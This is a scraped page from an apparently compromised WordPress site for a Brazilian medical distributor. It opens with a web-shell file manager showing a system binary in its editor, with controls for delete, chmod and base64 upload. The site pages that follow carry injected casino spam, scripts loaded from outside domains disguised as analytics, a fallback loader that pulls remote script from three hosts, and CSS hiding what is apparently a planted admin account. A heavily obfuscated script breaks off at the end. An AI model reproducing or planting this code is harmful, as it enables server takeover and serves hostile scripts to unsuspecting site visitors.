�                     L       �                     T       ��                     V                                                      dmidecode-3.6-2.el9.x86_64.debug    �&amp;�|�7zXZ  �ִF !   t/��g�] ?�E�h=��ڊ�2N�������(��?^� �J�/޸B̽}�D~l�2��T((���7I��Q�vWu���e���]�_��z&gt;Zzit��N�e�Et&amp;+����K�A�8�ҳO��v=�٨a��+���^q����_�*c�䴣�Q\����a���}��&lt;�q�1Ԋ2Ĳ��?�����b;��VX��C�h9p̕�c�y��ʋ�]&quot;fF�1_���Y�4�bk�2�V��b�SŞ���ڃ�j�ltk�5y���׃P����I�;	(����st��uYp��;j��]���U�]qQi@݌@a��`�:�[��F��o`�Q��p�%8^�W)�%���(U�FO�{l**�6�ۼ��	�.���Z��I��&lt;#߱�?=6��+�CFB�i�(m|���/��Q�ڋ]��O88�iEb���r��=�e���B��g��\މ��J4��˥i&#039;����=�T�b��/N&#039;Ai�^#�-U7�p� &gt;�]��0lY�Y�3�gF����6�_H-��xڐ#��K��� 0�B,�ݞ�9v�X�o�vk�om�&gt;0���� �@�+��b�[�����L�R�5J�[_0�p?)��*�7� v��)��}��p
F�����Kܺu��DҞ|��Fes��a��n�W4�vt&quot;Q�)`CX�P�:#p��[AsDv&#039;�I�hs�1&lt;a��o�
��Z�&gt;��;��-���R�M��Q��.n���׳!�����N��:��_e/���rp�gH�?ayS��?�;=w0�s��Dȉ�b�� [��B��@��΢�鷳#����&gt;�_�t���ld&gt;65�&#039;�$x�W%&amp;��Ɩ
�Cna.���
v�erx��!lM�o5 �����1E��w���g��3�DZ�`����Ѫ�X������db]��,�/�ն�SGst��$ ��vx���[4�TB��飆�ŢZ�X9�9TE�0�7a��}���m�81���c�o��Q����Լ�J�l�:v�2�2�y.Ғ�=����N�]�n��v�*gbiÙ {�ԯ=�ة�e��̍��t�V�|����K\h�*|�饤ڎ���/4R��UUA}��m%��jWӲ���j8+�&amp;^-�rl�G�i�s74#I8��e��.�┉̽�%�F&amp;&#039;Ӥ`����Z��g��{ή�)�r�o��H̴h1Io{ *}�~����d�)8 ����萵�4I�����^Ľ�U��:9 �Ifޢ)���t��7�ԃ�;�c��WQA�OP
2L�-�5�&amp;Ԯ�0*mA�8��y.L�@�S�A��E�
qf�-�ou�/�y��$}t	dn����2M�Fo1��&gt;��R�b|q[�v%͗��(&gt;crf�u�y.Eg�&quot;P�{*�o/�{�
�}�@�m�ƭ�W��R�#����$�^&quot;�4z���.�!�1��?�pb��
�,�JC!Il����3? m��a�����f�-��&#039;Lgϸ�rGN��0U��4�	,�p�G��+�������    f��*�K ��.  �j��g�    YZ .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .data.rel.ro .dynamic .got .data .bss .gnu_debuglink .gnu_debugdata                                                                                                                                         8      8      0                              &amp;             h      h      $                              9             �      �                                     G   ���o       �      �      4                             Q             �      �      �                          Y             �      �      :                             a   ���o                   j                            n   ���o       �      �      p                            }             �      �      �                           �      B       �      �                                 �              �       �                                    �              �       �      �                            �             �      �      �                            �             ��      ��      v�                             �             (�     (�                                   �              �      �     8�                             �             8(     8(     �                             �             �)     �)     �                             �             PB     PB                                  �             XB     XB                                  �             `B     `B     �9                              �             X|     X|     �                           �             H~     H~     �                            �              �      �     0                                          @�     0�     �                               
                     0�     (                                                   X�     &lt;                                                   ��     (                             </textarea>
                    <div style="margin-top:15px;display:flex;gap:8px;">
                        <button class="button button-green">Save</button>
                        <a href="?p=%2Fusr%2Fsbin" class="button button-red">Cancel</a>
                    </div>
                </form>
            </div>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/usr/sbin';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//gixxipi9823.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a86e84bb880c*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://gixxipi9823.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog wp-embed-responsive wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/you-could-potentially-enjoy-several-hand-from-the-specialist-from-the-the-same-time/">You could potentially enjoy several hand from the specialist from the the same time</a></h2><p>The same as classic black-jack, with many different statutes. That&#8217;s among reasonable edges into gambling enterprise floor, rivaled just because of the several games for example craps at web based casinos, in which wise gambling has actually our house virtue lowest. Enjoyed very first means, our house boundary into the an elementary game is at [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/for-the-programs-youll-have-entry-to-some-freebies-extra-falls-free-gc-and-you-will-sc-vip-benefits-and-a-lot-more/">For the programs, you&#8217;ll have entry to some freebies, extra falls, free GC and you will Sc, VIP benefits, and a lot more</a></h2><p>Shortly after stating BangCoins bonuses, never blow them all in one spin or you to definitely video game. For the terms and conditions, we got information about county supply to own claiming new site&#8217;s bonuses. Instead, you could allege its no-purchase allowed added bonus away from 50,000 GC and you can one Sc. So it [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/perform-quick-payout-gambling-enterprises-fees-charge-getting-distributions-and-deposits/">Perform quick payout gambling enterprises fees charge getting distributions and deposits?</a></h2><p>While you are found in the United kingdom, even when, you will need to establish their title ahead of they even allow you to play, so no delays contained in this service. But the point in which it becomes gluey happens when a good (supposedly) punctual detachment Big Bass Splash bonus gambling enterprise triggers a [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/charge-fast-withdrawal-casinos-allow-it-to-be-quick-profits-using-charge-debit-cards/">Charge fast withdrawal casinos allow it to be quick profits using Charge debit cards</a></h2><p>This article will reveal making use of a quick withdrawal gambling establishment to truly get your earnings less. Sure, there is certainly, every casino internet sites that individuals have demanded try secure quick detachment local casino internet. But not, we understand this might be annoying, therefore we have used in order that our recommended internet [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/overall-ports-are-the-best-complement-at-the-quick-withdrawal-casinos-if-you-have-to-obvious-bonus-betting-rapidly/">Overall, ports are the best complement at the quick withdrawal casinos if you have to obvious bonus betting rapidly</a></h2><p>You could face detachment waits whether they have large wagering Roulettino Casino requirements, very be sure to take a look at the T&#038;Cs just before stating. Mobile bonuses are not one kind of bonus; rather, he&#8217;s typical promos that you recieve regarding a simple withdrawal gambling establishment from the to tackle through the app or [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/bet365-gambling-enterprise-feedback-when-you-look-at-the-2026-added-bonus-video-game-professional-rating/">Bet365 Gambling enterprise Feedback when you look at the 2026: Added bonus, Video game, Professional Rating</a></h2><p>The bottom game comes with random keeps and you may crazy modifiers that will maintain your revolves enjoyable, however, larger gains listed here are seemingly unusual beyond your incentive series. The game possess dynamic reels you to definitely develop through the gamble, close to secret symbols which can revise to your higher-end combinations. Thematically, this [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/this-can-be-over-average-as-sweepstakes-gambling-enterprises-generally-share-with-you-ranging-from-one-5-south-carolina-for-their-send-inside-the-extra/">This can be over average, as sweepstakes gambling enterprises generally share with you ranging from one-5 South carolina for their send-inside the extra</a></h2><p>Where BangCoins indeed separates itself, for finest or worse, &#8216;s the limitation the underside you to matter, simple fact is that singular of one&#8217;s five you to definitely merely lets slot enjoy amount towards clearing they Confirmation handling generally need times under typical facts although complex circumstances of files quality circumstances, label discrepancies, otherwise address [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/find-the-best-nj-new-jersey-on-line-casino-bonus-offers-you-should-never-lose-out/">Find the best Nj-new jersey On-line casino Bonus Offers You should never Lose-out</a></h2><p>Casino incentives always lay a little extra money in your account, but could together with give you particular 100 % free enjoy solutions While we performed the casino review, we did not see a no deposit extra for people who are just enrolling. It�s a cumulative bonus of early in the day four places and [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/the-ultimate-guide-to-casino-welcome-packages-for-players/">The Ultimate Guide to Casino Welcome Packages for Players</a></h2><p>Welcome to the exciting world of online casinos! As a seasoned player with 15 years of experience playing online roulette, I have seen my fair share of casino welcome packages for players. In this comprehensive guide, I will walk you through everything you need to know about casino welcome packages, including what they are, how [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/%d1%81%d0%bb%d0%be%d1%82%d1%8b-%d1%81-%d0%bc%d0%b8%d0%bd%d0%b8%d0%bc%d0%b0%d0%bb%d1%8c%d0%bd%d0%be%d0%b9-%d1%81%d1%82%d0%b0%d0%b2%d0%ba%d0%be%d0%b9-%d0%be%d1%82-1-%d1%82%d0%b5%d0%bd%d0%b3%d0%b5-%d0%b2/">Слоты с минимальной ставкой от 1 тенге в казахстанских казино</a></h2><p>Когда бабушка в Алматы говорит внуку &#8220;не транжирь деньги на ерунду&#8221;, она вряд ли подозревает, что её наставление идеально описывает современный подход к онлайн-играм.Однако именно бережливость стала фирменной чертой тех, кто осваивает слоты с минимальной ставкой от 1 тенге.Этот формат появился не потому, что операторы вдруг расщедрились, &#8211; рынок</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/2/?edit=1&#038;p=%2Fusr%2Fsbin&#038;path=%2Fusr%2Fsbin%2Fdmidecode" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
"use strict";var rxdmS4,FlCAu25,g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;const FZHYVb=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x5b,0x1fff,0x58,0xd,0xe,0x5d,0x10,0x200,0xf,0x3,0x2,0x4,0x3ff,0x7f,0x1f,0x80,0x12,0x20,0x5,0x18,0xa,0x13,0x40,0xffff,"js",0x82,!0x1];function R_2lkdW(rxdmS4){var FlCAu25="<,^7;9x`%1.0+g~o:JG*fp]ca2O#m}B[bX5d{(wt=iA&TEUINLV$erR_?yKl|YCHvuknW/Z6)>Q8DshzSP4M3!\"Fq@j",g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;N4W9hYK(g3Gld7J=""+(rxdmS4||""),_PoKZj=g3Gld7J.length,MSUxhJ2=[],cUL0VT=FZHYVb[0x0],j2tRUWQ=FZHYVb[0x0],Q4sOnFn=-FZHYVb[0x1]);for(nco7OV=FZHYVb[0x0];nco7OV<_PoKZj;nco7OV++){var R_2lkdW=FlCAu25.indexOf(g3Gld7J[nco7OV]);if(R_2lkdW===-FZHYVb[0x1])continue;if(Q4sOnFn<FZHYVb[0x0]){Q4sOnFn=R_2lkdW}else{N4W9hYK(Q4sOnFn+=R_2lkdW*FZHYVb[0xc],cUL0VT|=Q4sOnFn<<j2tRUWQ,j2tRUWQ+=(Q4sOnFn&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(MSUxhJ2.push(cUL0VT&FZHYVb[0x3]),cUL0VT>>=FZHYVb[0x2],j2tRUWQ-=FZHYVb[0x2])}while(j2tRUWQ>FZHYVb[0x9]);Q4sOnFn=-FZHYVb[0x1]}}if(Q4sOnFn>-FZHYVb[0x1]){MSUxhJ2.push((cUL0VT|Q4sOnFn<<j2tRUWQ)&FZHYVb[0x3])}return t24J32(MSUxhJ2)}function s7MFvm(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=R_2lkdW(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}N4W9hYK(rxdmS4={},FlCAu25=["ey0.sM]{{1_D]9[aL$>xSDUU[k4|K2hO=+E.r8i`7*ZZlw,(`6(QnNaS<+","<=%R_(gr5|xBTM7Gf$txPyVvllU/n~U=)<","/NyRrKmG;1W>54:#Gx<x_UO%Blcub7Oc}fte`Q2I7","![cXYtO\"x",",Lg`=HGU%f_29{YJ(O_e@E(`(vQZNI{w&+WQddxZn*YmTI`*&CFLe$gIM*","MN6mNZpd7yxzM~Qwl7?x6z8`9g=z5g9w7}%1>P.e>JGNwL5{Dc7","YCH>0wma0~4b#O<cJbWO%DC\"}p`gd~T*gyWQZ56,","pHb$$K0,","9Lj}qy<{zo)H#^R#)7?1}Mu$hH:fY;Ba1OO#x{j\"fv*4+o$isClrFM?^2~t","Bu@$y|DxhH2#,{4=;km[9N6g&lw","k$U[c6<","vWTQ4CB^","Tcq>}Sz$(KsrSl&O*o_ed=g*+l.RtZ&t,b1B/rZQV|vL,)Z(_lGs~P<","?R]en)%awv,^3l,a($g[^\".\"$*!9%ovc|({ssD[*0l!P/;","o+g_Ghj+NHRZ&wo#96OsgN4U~p3Z[M}dnCS1","q>Hm1zH$Co=`};k{nc0sVLFcV1AN:#2}&&@xLWnc7","CW1$1\"QUd|xYel>*ql7","r$p;N$*,Ffg)X2ba^&^","#fIeMCKGOJr","Uxyx)C+a(K~_SMC}hZp`0M8,","Ofh;Y|#}!g3Q+3G=P7~`9_VBUrX~3Ibc>lKr<KF`P|SoRg2d0cg`@y^K~pw","+&nbCU{GWyYs%7.","m1c>2eEIvG)2^2]m_=,8g_W+;","2Oux{82r{vtmJ:Bdm,","fyC_N8gixv5)a6hO;6([4MS+UpPZ1(\"iAQB[3e0`l0Ld+t~","@JMsw4meKl9x]P$i:&^","5N2h6z9g|%:f)Mw24EV$3E.BY?ls<:p#]Rubx_E!x.SP42w2]bSLe),27","]Q~_bR1g,G=e!S,J2,","]oyx^UprAC}u;#F}$7J$JDrckH\"{<oSt}U.}$Z<","[c[;gQFiH|czW{A2bcFm!VDGT~_D[7","huYQCs:ZsroC36|{[QweO=?B$ROJ1:<BV5+.T8(*$|VS.9gwNf+.*","MlwL%P.G5HepO9#}*x:RmITa>K]5;7","$1/`ORf%!Ka_Sor=QC;}>yavUGj})l+OYupD./|BAfwm!|CASle.@I%Gx","T+$}EHr,6v0(hL+",">JBD?z>,",")7v>@w?epv:8cwdJjC/m1z4UPR[)vokGM<","BR9.}e@JkRk2lKYc\"EXbGVxBS+,)7Ord/CnsN$=+bo:z&6+t9LF1]",".